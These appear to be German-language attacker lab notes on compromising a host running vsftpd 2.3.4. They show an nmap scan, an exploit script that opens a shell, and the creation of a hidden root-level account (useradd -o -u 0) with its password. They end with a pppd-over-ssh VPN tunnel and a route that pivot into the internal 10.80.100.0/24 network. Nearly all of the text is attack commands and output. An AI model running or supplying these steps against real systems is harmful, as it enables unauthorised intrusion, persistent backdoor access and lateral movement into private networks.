Angreifer
Scan
- nmap -sV 10.80.100.105 -p 21
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST
Nmap scan report for 10.80.100.105
Host is up (0.00056s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
Service Info: OS: Unix
Nach Exploit googlen
- vsftpd 2.3 4 exploit-db
Exploit finden
Exploit ausführen
- python vsftp.py 10.80.100.105
Success, shell opened
Send `exit` to quit shell
Opfer
Läuft ssh?
tcp6 0 0 :::22 :::* LISTEN 4360/sshd
User anlegen
- useradd -m -o -u 0 -s /bin/bash -d /tmp/www www
- passwd www
Enter new UNIX password: www2www
Retype new UNIX password: www2www
passwd: password updated successfully
VPN einrichten um Zugriff zum Netz zu erlangen
Angreifer
Vpn-Hack
- pppd updetach noauth passive pty "ssh -P 10.80.100.105 -p 22 \
-o Batchmode=yes pppd nodetach notty noauth" ipparam vpn 172.29.29.2:172.29.29.1
- ip route add 10.80.100.0/24 via 172.29.29.1